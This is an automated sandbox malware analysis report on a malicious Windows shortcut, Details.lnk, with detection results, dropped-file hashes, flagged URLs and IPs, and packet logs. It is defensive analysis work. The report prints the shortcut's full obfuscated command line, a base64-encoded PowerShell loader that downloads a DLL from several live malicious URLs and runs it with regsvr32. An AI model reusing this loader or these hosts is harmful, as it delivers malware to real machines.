                                  https://173.82.82.196/6regsvr32.exe, 00000004.00000002.702313746.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://nakharinitwebhosting.com/HSDYKN1X5GLF/powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/09/enumerationsvchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://173.82.82.196/~regsvr32.exe, 00000004.00000002.702313746.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.jsonsintl.compowershell.exe, 00000002.00000002.474725434.0000021B5EFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.474715646.0000021B5EFE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://contoso.com/powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.hotspotshield.com/terms/svchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.pango.co/privacysvchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://disneyplus.com/legal.svchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.459120911.0000021B5E3F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://cmentarz.5v.pl/themes/zalMkTb/powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://help.disneyplus.com.svchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jsonsintl.comxpowershell.exe, 00000002.00000002.474715646.0000021B5EFE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            173.82.82.196
                                            unknownUnited States
                                            35916MULTA-ASN1UStrue
                                            98.142.105.106
                                            jsonsintl.comUnited States
                                            33182DIMENOCUSfalse
                                            IP
                                            192.168.2.1
                                            127.0.0.1
                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:632105
                                            Start date and time: 23/05/202209:53:082022-05-23 09:53:08 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 8m 23s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:Details.lnk
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:22
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winLNK@14/8@2/4
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HDC Information:
                                            • Successful, ratio: 51.3% (good quality ratio 27.5%)
                                            • Quality average: 32.8%
                                            • Quality standard deviation: 37.5%
                                            HCA Information:
                                            • Successful, ratio: 96%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .lnk
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Execution Graph export aborted for target powershell.exe, PID 6976 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: Details.lnk
                                            TimeTypeDescription
                                            09:54:27API Interceptor43x Sleep call for process: powershell.exe modified
                                            09:54:49API Interceptor10x Sleep call for process: svchost.exe modified
                                            No context
                                            No context
                                            No context
                                            No context
                                            No context
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x44de5033, page size 16384, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):786432
                                            Entropy (8bit):0.25064317413549325
                                            Encrypted:false
                                            SSDEEP:384:s+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zSB2nSB2RSjlK/+mLesOj1J2
                                            MD5:37920267F985A4C2FA896BD3E360E036
                                            SHA1:A7FA66D957D32B88514E42993501EF7DC25B9CA4
                                            SHA-256:5ACD1AAE82C5B97D9FD413358B721EC6292B5228D3D67C998AEE6FB58500C4AA
                                            SHA-512:72C4F5882813F47A8F78BD3761334358076B4657A8BAF9225F8CB92CD285F506FC3ED422CF2A8A96CDFC9C0F2ED8287BDE22690AD36215AFE01FCC333DA19DB8
                                            Malicious:false
                                            Preview:D.P3... ................e.f.3...w........................&..........w..26...zg.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................':].26...z.a................O+f.26...z..........................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1192
                                            Entropy (8bit):5.325275554903011
                                            Encrypted:false
                                            SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                            MD5:05CF074042A017A42C1877FC5DB819AB
                                            SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                            SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                            SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                            Malicious:false
                                            Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview:1
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview:1
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):365056
                                            Entropy (8bit):7.158107270371674
                                            Encrypted:false
                                            SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTN0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TsRIvgMSS3AyUrhYu3j
                                            MD5:12B85FB674E94931DA5BEBDAC764DA9A
                                            SHA1:9B3925EF9D538E889DAD5F7093CA3C578F9730C9
                                            SHA-256:4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                                            SHA-512:5167C98936578940E8A15308776DC10A2C3846C9262D7C189465F7DB1BA49E76DD4B227C8E2AD3ABA37139EE3E65A179B51397BD18362C9DF83D2160523C7EA1
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 31%, Browse
                                            • Antivirus: ReversingLabs, Detection: 40%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):2558
                                            Entropy (8bit):5.978796756550633
                                            Encrypted:false
                                            SSDEEP:48:BZev/qZoO+VipJ7o/awfYnB33ZoqDYB1ZsVipJ7o/awfYnB33M4ZZ2S:BZS/qZN+kpOtYnBH+qDo1ZskpOtYnBHF
                                            MD5:FFD8F93BB0696A6A6AAA7362FFE71269
                                            SHA1:F59B505BE073482FEBFBF0D9438D52A4975B1DC6
                                            SHA-256:3B4A93F26B4B849905DDA7A1E246736D3B103D44406871A217257B14DCCC43DD
                                            SHA-512:ABA8247C422B4049AAB12E223DEE28B8F075C558A3E9000E5FE97C69C102E917A6CF090BF1A21124D6F2E6EADE410A207C620DBC5B5F45E829D20B11DF88C32C
                                            Malicious:false
                                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20220523095426..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -c &{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):55
                                            Entropy (8bit):4.306461250274409
                                            Encrypted:false
                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                            Malicious:false
                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                            Process:C:\Windows\System32\regsvr32.exe
                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):365056
                                            Entropy (8bit):7.158107270371674
                                            Encrypted:false
                                            SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTN0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TsRIvgMSS3AyUrhYu3j
                                            MD5:12B85FB674E94931DA5BEBDAC764DA9A
                                            SHA1:9B3925EF9D538E889DAD5F7093CA3C578F9730C9
                                            SHA-256:4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                                            SHA-512:5167C98936578940E8A15308776DC10A2C3846C9262D7C189465F7DB1BA49E76DD4B227C8E2AD3ABA37139EE3E65A179B51397BD18362C9DF83D2160523C7EA1
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 31%, Browse
                                            • Antivirus: ReversingLabs, Detection: 40%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                            File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=134, Archive, ctime=Fri Feb 4 06:07:07 2022, mtime=Thu May 19 18:45:55 2022, atime=Fri Feb 4 06:07:07 2022, length=289792, window=hidenormalshowminimized
                                            Entropy (8bit):3.7542117210768318
                                            TrID:
                                            • Windows Shortcut (20020/1) 100.00%
                                            File name:Details.lnk
                                            File size:3599
                                            MD5:4915772035b89b1e023e94626dbd8da9
                                            SHA1:8cf2652d3a1c37c488ced4f16a01a26f1e407087
                                            SHA256:4aaa9741e3fb2a63803214bfacd8a5f6e61de3c78612666124f746cf13957912
                                            SHA512:f0b3ea31b3afb9b14aaf65034f697e2070e9921b6e3df26952451e6ccdfefbe8026a40acf33992f4061593502c625eebc79c7dc597e0b908a716ddcdd8c96945
                                            SSDEEP:48:8iMuTKmM8LXjFoByV2jGxHiBdb7mbtfcIsmkJgZfRAMI2aby:8iMuWeLpSycKxCBdb7bm4MR
                                            TLSH:7F71BF397ED95108E5F3DFB2BCD9B596CFAAF573B512499E0081030A4851600EE96E3F
                                            File Content Preview:L..................F.... .....<.....S....k....<......l......................5....P.O. .:i.....+00.../C:\...................V.1......T....Windows.@........OwH.T!.....!.........................W.i.n.d.o.w.s.....Z.1......T.2..System32..B........OwH.T!.......
                                            Icon Hash:fc3cf4c4dcd9d9ed

                                            General

                                            Relative Path:
                                            Command Line Argument:/v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                                            Icon location:shell32.dll
                                            TimestampSource PortDest PortSource IPDest IP
                                            May 23, 2022 09:54:31.185982943 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.314140081 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.315192938 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.325814009 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.454092026 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493376970 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493429899 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493467093 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493514061 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.493515968 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493575096 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493591070 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.493633986 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493675947 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493695021 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.493732929 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493781090 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493788958 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.493839025 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.493906021 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.621980906 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622023106 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622046947 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622070074 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622097969 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.622144938 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.622735977 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622761965 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622795105 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622818947 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622838974 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.622843027 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622869015 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622915030 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.622920990 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622946978 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622955084 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.622970104 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.622997046 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.623006105 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.623020887 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.623047113 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.623058081 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.623071909 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.623096943 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.623109102 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.623128891 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.623155117 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.623168945 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.623222113 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.751909971 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.752074003 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.752144098 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.752226114 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.752352953 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.752419949 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.752614975 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.752650023 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.752686024 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.752718925 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.752759933 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.752784967 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753094912 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753130913 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753164053 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753184080 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753197908 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753231049 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753236055 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753262997 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753300905 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753307104 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753340960 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753374100 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753391981 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753407001 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753453016 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753456116 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753488064 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753525019 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753534079 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753567934 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753599882 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753618002 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753633976 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753667116 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753679037 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753698111 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753732920 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753742933 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753763914 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753809929 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753838062 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753870964 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753904104 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753909111 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.753935099 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753968954 CEST804976398.142.105.106192.168.2.5
                                            May 23, 2022 09:54:31.753978968 CEST4976380192.168.2.598.142.105.106
                                            May 23, 2022 09:54:31.754002094 CEST804976398.142.105.106192.168.2.5
